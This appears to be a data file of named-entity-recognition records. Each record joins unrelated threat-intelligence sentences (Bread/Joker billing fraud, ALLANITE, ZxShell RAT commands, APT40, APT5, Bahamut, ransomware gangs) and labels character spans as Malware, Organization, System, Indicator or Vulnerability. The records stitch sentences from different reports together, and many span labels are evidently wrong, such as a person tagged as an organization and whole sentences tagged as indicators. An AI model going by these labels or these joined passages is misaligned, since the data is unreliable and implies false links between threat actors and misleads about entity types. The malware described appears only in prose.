Maybe the text in the email jokes about the trip you took last week and how you came back sunburnt .", "spans": [{"start": 42, "end": 49, "label": "System"}, {"start": 54, "end": 57, "label": "System"}, {"start": 214, "end": 221, "label": "Malware"}]} {"text": "It is quite unusual to find an actual organization behind mobile malware , as most of them are developed by purely malicious actors . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities . It will then retry the connection with the next remote host , if there is one . Sandworm \u2019s Threat Activity Reveals Insights into Russia \u2019s Offensive Cyber Capabilities", "spans": [{"start": 344, "end": 371, "label": "Organization"}, {"start": 394, "end": 432, "label": "Organization"}]} {"text": "It is important to note that the activity conducted by the malware is not borderline advertising , but definitely an illegitimate use of the users \u2019 mobile devices for generating fraudulent clicks , benefiting the attackers . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly . It is noteworthy that this function includes the code to set the ZxShell node as a server : if one of the hardcoded boolean value is set to 1, a listening socket is created . 
After analyzing code from a command and control ( C2 ) server used in the global cyber - espionage campaign dubbed ' Sharpshooter ' , security researchers found more evidence linking it to North Korea 's Lazarus threat actor .", "spans": [{"start": 246, "end": 249, "label": "Organization"}, {"start": 336, "end": 344, "label": "Organization"}, {"start": 428, "end": 435, "label": "Malware"}, {"start": 566, "end": 599, "label": "System"}, {"start": 608, "end": 645, "label": "Organization"}, {"start": 655, "end": 667, "label": "Organization"}, {"start": 672, "end": 692, "label": "Organization"}, {"start": 727, "end": 749, "label": "Organization"}]} {"text": "In addition to the clicking activity , Judy displays a large amount of advertisements , which in some cases leave users with no option but clicking on the ad itself . Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests . The code waits for an incoming connection . Module ID Internal Name 1 module_ipc 2 module_monitor 3 module_apu 4 module_event 5 module_net", "spans": [{"start": 39, "end": 43, "label": "Malware"}, {"start": 218, "end": 221, "label": "Organization"}, {"start": 333, "end": 427, "label": "Malware"}]} {"text": "Although most apps have positive ratings , some of the users have noticed and reported Judy \u2019 s suspicious activities , as seen in the images below : As seen in previous malware , such as DressCode , a high reputation does not necessarily indicate that the app is safe for use . ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system . When the connection is established a new thread is spawned that starts with the MainConnectionIo function . 
The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": [{"start": 87, "end": 91, "label": "Malware"}, {"start": 188, "end": 197, "label": "Malware"}, {"start": 519, "end": 541, "label": "Indicator"}, {"start": 552, "end": 560, "label": "Organization"}, {"start": 625, "end": 633, "label": "Organization"}, {"start": 650, "end": 658, "label": "Organization"}, {"start": 669, "end": 694, "label": "Organization"}]} {"text": "Hackers can hide their apps \u2019 real intentions or even manipulate users into leaving positive ratings , in some cases unknowingly . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation . The MainConnectionIo function checks if the Windows Firewall is enabled , sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function . \u2022 Other actors merged into this group : 0 Sign up for free Mandiant Threat Intelligence for detailed reports about UNC groups including :", "spans": [{"start": 131, "end": 137, "label": "Organization"}, {"start": 329, "end": 336, "label": "System"}, {"start": 337, "end": 345, "label": "System"}, {"start": 368, "end": 382, "label": "System"}, {"start": 626, "end": 636, "label": "Organization"}]} {"text": "Users can not rely on the official app stores for their safety , and should implement advanced security protections capable of detecting and blocking zero-day mobile malware . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . Then the connection is retried . 
Figure 2 : Historical Russia - nexus activity impacting OT", "spans": [{"start": 318, "end": 334, "label": "Organization"}, {"start": 392, "end": 415, "label": "Organization"}, {"start": 426, "end": 428, "label": "System"}]} {"text": "PHA Family Highlights : Bread ( and Friends ) January 9 , 2020 In this edition of our PHA Family Highlights series we introduce Bread , a large-scale billing fraud family . In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors . The received command is then processed by the ZxShell function with the ProcessCommand function . Since early 2023 , we have seen several new Yashma strains emerge , including ANXZ , Sirattacker , and Shadow Men Team .", "spans": [{"start": 24, "end": 29, "label": "Malware"}, {"start": 128, "end": 133, "label": "Malware"}, {"start": 395, "end": 414, "label": "Organization"}, {"start": 421, "end": 440, "label": "Organization"}, {"start": 489, "end": 496, "label": "Malware"}, {"start": 619, "end": 623, "label": "Organization"}, {"start": 626, "end": 637, "label": "Organization"}, {"start": 644, "end": 659, "label": "Organization"}]} {"text": "We first started tracking Bread ( also known as Joker ) in early 2017 , identifying apps designed solely for SMS fraud . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . The command processing function starts by substituting the main module name and path in the hosting process PEB , with the one of the default internet browser . The attacks that Anonymous Sudan has claimed in support of KillNet , both before and after it officially joined the collective , have broadened the geographic scope of its targeting to include entities elsewhere in Europe and the U.S. 
; it has since continued to expand the scope of its targeting further afield to include countries such as Israel and Ethiopia .", "spans": [{"start": 26, "end": 31, "label": "Malware"}, {"start": 48, "end": 53, "label": "Malware"}, {"start": 199, "end": 214, "label": "Organization"}, {"start": 471, "end": 478, "label": "Organization"}]} {"text": "As the Play Store has introduced new policies and Google Play Protect has scaled defenses , Bread apps were forced to continually iterate to search for gaps . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy . This trick renders identification by firewall more cumbersome . In general terms , spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data .", "spans": [{"start": 7, "end": 17, "label": "System"}, {"start": 50, "end": 69, "label": "System"}, {"start": 92, "end": 97, "label": "Malware"}, {"start": 168, "end": 180, "label": "Organization"}, {"start": 202, "end": 213, "label": "Organization"}, {"start": 461, "end": 469, "label": "System"}, {"start": 507, "end": 514, "label": "Malware"}, {"start": 518, "end": 631, "label": "Malware"}]} {"text": "They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected . ALLANITE operations continue and intelligence indicates activity since at least May 2017 . 
A host firewall Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 253, "end": 269, "label": "System"}, {"start": 309, "end": 325, "label": "System"}, {"start": 353, "end": 364, "label": "System"}, {"start": 415, "end": 428, "label": "Organization"}]} {"text": "Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere . APT Anchor Panda is a Chinese threat actor group who target maritime operations . S-TOOLwill recognize the outgoing connection as originated by the browser instead of the ZxShell service host process . Attackers send these emails to multiple accounts , hoping that someone will believe the story , and pay up .", "spans": [{"start": 85, "end": 95, "label": "System"}, {"start": 307, "end": 314, "label": "Malware"}, {"start": 338, "end": 386, "label": "Indicator"}]} {"text": "In this post , we show how Google Play Protect has defended against a well organized , persistent attacker and share examples of their techniques . According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active . The browser process always performs outgoing connections and the firewall should n\u2019t block them . 
Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman \u2019s messages \u2014 three years worth .", "spans": [{"start": 27, "end": 46, "label": "System"}, {"start": 339, "end": 347, "label": "System"}, {"start": 387, "end": 401, "label": "Organization"}, {"start": 461, "end": 472, "label": "Organization"}]} {"text": "TL ; DR Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users Bread apps originally performed SMS fraud , but have largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect More information on stats and relative impact is available in the Android Security 2018 Year in Review report BILLING FRAUD Bread apps typically fall into two categories : SMS fraud ( older versions ) and toll fraud ( newer versions ) . Dragos does not corroborate nor conduct political attribution to threat activity . The command processing is straightforward . Subsequently , KillNet claimed to have compromised NATO \u2019s training site , Joint Advanced Distributed Learning , and published dozens of purportedly leaked images on its channels .", "spans": [{"start": 8, "end": 27, "label": "System"}, {"start": 61, "end": 66, "label": "Malware"}, {"start": 81, "end": 91, "label": "System"}, {"start": 130, "end": 135, "label": "Malware"}, {"start": 256, "end": 260, "label": "System"}, {"start": 339, "end": 358, "label": "System"}, {"start": 425, "end": 432, "label": "System"}, {"start": 483, "end": 488, "label": "Malware"}, {"start": 596, "end": 602, "label": "Organization"}, {"start": 774, "end": 795, "label": "System"}]} {"text": "Both of these types of fraud take advantage of mobile billing techniques involving the user \u2019 s carrier . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing . 
Here is the list of common commands : Methods for doing that include built - in functionality of malware or by using utilities present on the system .", "spans": [{"start": 128, "end": 139, "label": "System"}, {"start": 142, "end": 152, "label": "System"}, {"start": 157, "end": 173, "label": "System"}, {"start": 323, "end": 330, "label": "Malware"}]} {"text": "SMS Billing Carriers may partner with vendors to allow users to pay for services by SMS . Their targets are marine companies that operate in and around the South China Sea , an area of much Chinese interest . Help / ? Get help . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": [{"start": 108, "end": 124, "label": "Organization"}, {"start": 229, "end": 237, "label": "Organization"}, {"start": 249, "end": 336, "label": "Malware"}, {"start": 357, "end": 369, "label": "Malware"}, {"start": 386, "end": 417, "label": "System"}]} {"text": "The user simply needs to text a prescribed keyword to a prescribed number ( shortcode ) . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities . Exit / Quit Exit and shut down the botnet client . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 234, "end": 246, "label": "Organization"}, {"start": 338, "end": 358, "label": "Organization"}, {"start": 464, "end": 482, "label": "System"}]} {"text": "A charge is then added to the user \u2019 s bill with their mobile service provider . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope . SysInfo Get target System information . 
We were able to find additional links between Hack520 \u2019s \u201c Pig network \u201d and the Winnti group \u2019s activities .", "spans": [{"start": 133, "end": 152, "label": "Organization"}, {"start": 153, "end": 170, "label": "Organization"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 283, "end": 309, "label": "Organization"}, {"start": 318, "end": 330, "label": "Organization"}]} {"text": "Toll Billing Carriers may also provide payment endpoints over a web page . The group has been active since at least January 2013 . SYNFlood Perform a SYN attack on a host . Many threat groups successfully leverage aging vulnerabilities , which , if they had been patched by their victims , may have prevented an attack .", "spans": [{"start": 178, "end": 191, "label": "Organization"}, {"start": 214, "end": 243, "label": "Vulnerability"}]} {"text": "The user visits the URL to complete the payment and enters their phone number . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . Ps Process service Unix command implementation . What \u2019s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": [{"start": 108, "end": 118, "label": "Organization"}, {"start": 274, "end": 278, "label": "System"}, {"start": 348, "end": 354, "label": "System"}]} {"text": "Verification that the request is coming from the user \u2019 s device is completed using two possible methods : The user connects to the site over mobile data , not WiFi ( so the service provider directly handles the connection and can validate the phone number ) ; or The user must retrieve a code sent to them via SMS and enter it into the web page ( thereby proving access to the provided phone number ) . 
The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world . CleanEvent Clear System Event log . By using LotL techniques , the actor likely decreased the time and resources required to conduct its cyber physical attack .", "spans": [{"start": 448, "end": 459, "label": "Organization"}, {"start": 462, "end": 471, "label": "Organization"}, {"start": 476, "end": 483, "label": "Organization"}]} {"text": "Fraud Both of the billing methods detailed above provide device verification , but not user verification . The times of day the group is active also suggests that it is based near Beijing and the group has reportedly used malware that has been observed in other Chinese operations , indicating some level of collaboration . FindPass Find login account password . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": []} {"text": "The carrier can determine that the request originates from the user \u2019 s device , but does not require any interaction from the user that can not be automated . Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state . FileTime Get time information about a file . While there may be other groups they want to target also , they tend to be more persistent .", "spans": []} {"text": "Malware authors use injected clicks , custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools . FindDialPass List all the dial-up accounts and passwords . 
Although attacks on education have been a staple of the ransomware ecosystem for years , Vice Society appears to have specialised in delivering misery to schools , colleges , and universities in a highly unusual way .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 317, "end": 341, "label": "System"}, {"start": 423, "end": 432, "label": "Organization"}, {"start": 459, "end": 469, "label": "Malware"}, {"start": 492, "end": 504, "label": "Organization"}, {"start": 557, "end": 564, "label": "Organization"}, {"start": 567, "end": 575, "label": "Organization"}, {"start": 582, "end": 594, "label": "Organization"}]} {"text": "STRING & DATA OBFUSCATION Bread apps have used many innovative and classic techniques to hide strings from analysis engines . Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . User Account Management System . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": [{"start": 308, "end": 336, "label": "System"}, {"start": 471, "end": 559, "label": "Indicator"}]} {"text": "Here are some highlights . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . TransFile Transfer file in or from remote host . 
Software developers can use coded certificates to digitally sign their software , which means any code with that signature becomes a trusted source .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 183, "end": 199, "label": "System"}, {"start": 300, "end": 319, "label": "Organization"}]} {"text": "Standard Encryption Frequently , Bread apps take advantage of standard crypto libraries in ` java.util.crypto ` . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . Execute Run a program in the remote host . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": [{"start": 93, "end": 109, "label": "Indicator"}, {"start": 293, "end": 321, "label": "System"}, {"start": 367, "end": 376, "label": "Organization"}, {"start": 438, "end": 464, "label": "Organization"}, {"start": 467, "end": 483, "label": "Organization"}, {"start": 488, "end": 499, "label": "Organization"}, {"start": 513, "end": 586, "label": "Organization"}]} {"text": "We have discovered apps using AES , Blowfish , and DES as well as combinations of these to encrypt their strings . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors . SC Service control command , implemented as the Windows one . Our initial investigation on the domains registered by Hack520 revealed that similar domains ( listed below ) were registered by another profile .", "spans": [{"start": 278, "end": 285, "label": "System"}, {"start": 347, "end": 354, "label": "Organization"}]} {"text": "Custom Encryption Other variants have used custom-implemented encryption algorithms . APT5 has been active since at least 2007 . 
CA Clone user account . That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": [{"start": 86, "end": 90, "label": "Organization"}, {"start": 193, "end": 202, "label": "Malware"}, {"start": 270, "end": 286, "label": "Malware"}]} {"text": "Some common techniques include : basic XOR encryption , nested XOR and custom key-derivation methods . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications . RunAs Create new process as another User or Process context . In a modern ransomware attack the target is an entire organisation , not just one or two computers .", "spans": [{"start": 103, "end": 107, "label": "Organization"}, {"start": 207, "end": 225, "label": "Organization"}, {"start": 230, "end": 250, "label": "Organization"}, {"start": 282, "end": 306, "label": "Organization"}, {"start": 418, "end": 469, "label": "Organization"}]} {"text": "Some variants have gone so far as to use a different key for the strings of each class . APT5 targeted the network of an electronics firm that sells products for both industrial and military applications . TermSvc Terminal service configuration ( working on Win Xp/2003 ) . None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": [{"start": 89, "end": 93, "label": "Organization"}, {"start": 121, "end": 137, "label": "Organization"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 258, "end": 269, "label": "System"}]} {"text": "Split Strings Encrypted strings can be a signal that the code is trying to hide something . 
The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided . GetCMD Remote Shell . June also witnessed a staggering increase in attacks from relatively new gangs such as Akira ( 26 ) and 8Base ( 41 ) , enough to propel both of them into the top five \u2014 a designation usually reserved for more familiar names like ALPHV , who was conspicuously silent in June .", "spans": [{"start": 121, "end": 135, "label": "Organization"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 393, "end": 398, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 535, "end": 540, "label": "Organization"}]} {"text": "Bread has used a few tricks to keep strings in plaintext while preventing basic string matching . In one case in late 2014 , APT5 breached the network of an international telecommunications company . Shutdown Logout , shutdown or restart the target system . Check the flag T as indicator if single stepping .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 157, "end": 197, "label": "Organization"}, {"start": 268, "end": 306, "label": "Indicator"}]} {"text": "Going one step further , these substrings are sometimes scattered throughout the code , retrieved from static variables and method calls . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . ZXARPS Spoofing , redirection , packet capture . The U.S. Government has developed new mechanisms to help Ukraine identify cyber threats and recover from cyber incidents .", "spans": [{"start": 283, "end": 311, "label": "Organization"}, {"start": 367, "end": 382, "label": "Organization"}]} {"text": "Various versions may also change the index of the split ( e.g . 
APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware . ZXNC Run ZXNC v1.1 \u2013 a simple telnet client . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": [{"start": 131, "end": 159, "label": "Organization"}, {"start": 165, "end": 181, "label": "System"}, {"start": 395, "end": 425, "label": "Vulnerability"}]} {"text": "\u201c .clic \u201d and \u201c k ( ) ; \u201d ) . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . ZXHttpProxy Run a HTTP proxy server on the workstation . It is still unclear whether its authors have any links to known cybercrime organizations .", "spans": [{"start": 287, "end": 294, "label": "Organization"}, {"start": 319, "end": 343, "label": "Organization"}]} {"text": "Delimiters Another technique to obfuscate unencrypted strings uses repeated delimiters . The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems . ZXSockProxy Run a Sock 4 & 5 Proxy server . 
Learn How ThreatConnect Can Help Protect Email From Phishing and BEC Attacks", "spans": [{"start": 93, "end": 96, "label": "Organization"}, {"start": 108, "end": 139, "label": "Organization"}, {"start": 153, "end": 157, "label": "Organization"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 267, "end": 296, "label": "System"}, {"start": 386, "end": 399, "label": "System"}]} {"text": "A short , constant string of characters is inserted at strategic points to break up keywords : At runtime , the delimiter is removed before using the string : API OBFUSCATION SMS and toll fraud generally requires a few basic behaviors ( for example , disabling WiFi or accessing SMS ) , which are accessible by a handful of APIs . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government . ZXHttpServer Run a custom HTTP server . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": [{"start": 331, "end": 337, "label": "Organization"}, {"start": 426, "end": 456, "label": "Organization"}, {"start": 459, "end": 477, "label": "Organization"}, {"start": 493, "end": 510, "label": "Organization"}, {"start": 522, "end": 540, "label": "Organization"}, {"start": 569, "end": 573, "label": "Indicator"}]} {"text": "Given that there are a limited number of behaviors required to identify billing fraud , Bread apps have had to try a wide variety of techniques to mask usage of these APIs . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks . PortScan Run TCP Port MultiScanner v1.0 . 
Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": [{"start": 88, "end": 93, "label": "Malware"}, {"start": 174, "end": 194, "label": "Organization"}, {"start": 321, "end": 324, "label": "Indicator"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 398, "end": 416, "label": "Indicator"}, {"start": 421, "end": 431, "label": "Indicator"}, {"start": 448, "end": 469, "label": "Indicator"}]} {"text": "Reflection Most methods for hiding API usage tend to use Java reflection in some way . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . KeyLog Capture or record the remote computer \u2019s keystrokes . The code contains the next stage stored as hexadecimal encoded strings and is split into multiple strings so that an antivirus scan would not detect the content as potentially malicious .", "spans": [{"start": 100, "end": 106, "label": "Organization"}, {"start": 109, "end": 113, "label": "Organization"}, {"start": 169, "end": 172, "label": "System"}, {"start": 177, "end": 180, "label": "System"}, {"start": 257, "end": 265, "label": "Malware"}, {"start": 329, "end": 399, "label": "Malware"}, {"start": 404, "end": 434, "label": "Malware"}]} {"text": "In some samples , Bread has simply directly called the Reflect API on strings decrypted at runtime . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack . The implementation is a userland keylogger that polls the keymap with each keystroke . 
Notably , the Telegram channel in which actors claiming to be from REvil claimed links with KillNet had been created only days before the operation began on June 15 , 2023 .", "spans": [{"start": 18, "end": 23, "label": "Malware"}, {"start": 263, "end": 272, "label": "System"}, {"start": 331, "end": 347, "label": "System"}, {"start": 384, "end": 389, "label": "Organization"}]} {"text": "JNI Bread has also tested our ability to analyze native code . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware . LoadDll Load a DLL into the specified process . This campaign also strays from Infys usual target group of Iranian individuals and entities , with victims of Foudre located in Sweden , the Netherlands , the U.S. , along with others across Europe , Iraq , and India .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 221, "end": 239, "label": "System"}, {"start": 242, "end": 249, "label": "System"}, {"start": 257, "end": 260, "label": "System"}, {"start": 295, "end": 303, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 349, "end": 381, "label": "Organization"}, {"start": 400, "end": 406, "label": "Organization"}]} {"text": "In one sample , no SMS-related code appears in the DEX file , but there is a native method registered . Over the summer they compromised several sites , including a well-known Uyghur website written in that native language . End Terminate ZxShell DLL . 
In terms of the fallout , it \u2019s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": [{"start": 239, "end": 246, "label": "Malware"}, {"start": 247, "end": 250, "label": "System"}, {"start": 314, "end": 318, "label": "Organization"}, {"start": 351, "end": 361, "label": "Vulnerability"}]} {"text": "Two strings are passed into the call , the shortcode and keyword used for SMS billing ( getter methods renamed here for clarity ) . In contrast to many other APT campaigns , which tend to rely heavily on spear phishing to gain victims , \" th3bug \" is known for compromising legitimate websites their intended visitors are likely to frequent . Uninstall Uninstall and terminate ZxShell bot DLL . The exploits were sourced from different VPN provider IP addresses and previously compromised third - party devices .", "spans": [{"start": 377, "end": 384, "label": "Malware"}, {"start": 389, "end": 392, "label": "System"}, {"start": 436, "end": 448, "label": "System"}, {"start": 449, "end": 461, "label": "System"}, {"start": 466, "end": 512, "label": "Organization"}]} {"text": "In the native library , it stores the strings to access the SMS API . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . ShareShell Share a shell to other . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": [{"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 173, "end": 192, "label": "Vulnerability"}, {"start": 211, "end": 221, "label": "Organization"}]} {"text": "The nativesend method uses the Java Native Interface ( JNI ) to fetch and call the Android SMS API . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . CloseFW Switch off Windows Firewall . 
The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": [{"start": 83, "end": 90, "label": "System"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 151, "end": 168, "label": "Vulnerability"}, {"start": 247, "end": 254, "label": "System"}]} {"text": "The following is a screenshot from IDA with comments showing the strings and JNI functions . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers . FileMG File Manager . winvnc Remote Desktop . rPortMap Port Forwarding . capsrv Video Device Spying . zxplug Add and load a ZxShell custom plugin . Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": [{"start": 297, "end": 315, "label": "Organization"}, {"start": 442, "end": 449, "label": "Malware"}, {"start": 466, "end": 478, "label": "Organization"}, {"start": 529, "end": 536, "label": "Organization"}, {"start": 543, "end": 558, "label": "Organization"}, {"start": 597, "end": 618, "label": "Organization"}]} {"text": "WebView JavaScript Interface Continuing on the theme of cross-language bridges , Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 . This set of functionality allows the operator complete control of a system . 
Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": [{"start": 81, "end": 86, "label": "Malware"}, {"start": 211, "end": 247, "label": "Organization"}, {"start": 361, "end": 370, "label": "Organization"}]} {"text": "The following method is declared in the DEX . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk . Being able to transfer and execute files on the infected system means the attacker can run any code they please . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month \u2019s most active ransomware gang .", "spans": [{"start": 128, "end": 153, "label": "Organization"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 453, "end": 457, "label": "Organization"}, {"start": 505, "end": 512, "label": "Organization"}]} {"text": "Without context , this method does not reveal much about its intended behavior , and there are no calls made to it anywhere in the DEX . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Further , the keylogging and remote desktop functionality allows the operator to spy on the infected machine , observing all keystrokes and viewing all user actions . 
It allows security researchers to analyze the source code and understand the attacker \u2019s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": [{"start": 199, "end": 206, "label": "Organization"}]} {"text": "However , the app does create a WebView and registers a JavaScript interface to this class . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data . Unloads ZxShell and deletes all of the active components . The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 128, "end": 155, "label": "System"}, {"start": 351, "end": 358, "label": "Malware"}, {"start": 414, "end": 430, "label": "Vulnerability"}, {"start": 454, "end": 457, "label": "Organization"}]} {"text": "This gives JavaScript run in the WebView access to this method . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . This simply deletes the ZxShell service key from the Windows registry ( using SHDeleteKey Api ) and all of the subkeys . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . 
\u201d", "spans": [{"start": 65, "end": 72, "label": "Organization"}, {"start": 134, "end": 149, "label": "System"}, {"start": 266, "end": 273, "label": "Malware"}, {"start": 295, "end": 302, "label": "System"}, {"start": 376, "end": 392, "label": "Vulnerability"}, {"start": 467, "end": 483, "label": "Vulnerability"}]} {"text": "The app loads a URL pointing to a Bread-controlled server . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Finally , it marks ZxShell main Dll for deletion with the MoveFileEx Windows API . TIEDYE supports the following protocols : tcp , tcp6 , udp , upd6 , http , https , proxy_socks4 , proxy_socks4a , pipe , ssl , ssl3 , and rdp .", "spans": [{"start": 122, "end": 129, "label": "Organization"}, {"start": 251, "end": 258, "label": "Malware"}, {"start": 264, "end": 267, "label": "System"}, {"start": 301, "end": 308, "label": "System"}, {"start": 315, "end": 321, "label": "Malware"}, {"start": 357, "end": 360, "label": "System"}, {"start": 363, "end": 367, "label": "System"}, {"start": 370, "end": 373, "label": "System"}, {"start": 376, "end": 380, "label": "System"}, {"start": 383, "end": 387, "label": "System"}, {"start": 390, "end": 395, "label": "System"}, {"start": 398, "end": 410, "label": "System"}, {"start": 413, "end": 426, "label": "System"}, {"start": 429, "end": 433, "label": "System"}, {"start": 436, "end": 439, "label": "System"}, {"start": 442, "end": 446, "label": "System"}, {"start": 453, "end": 456, "label": "System"}]} {"text": "The response contains some basic HTML and JavaScript . Several times , APT5 has targeted organizations and personnel based in Southeast Asia . This function is the supporting functionality for WinVNC . 
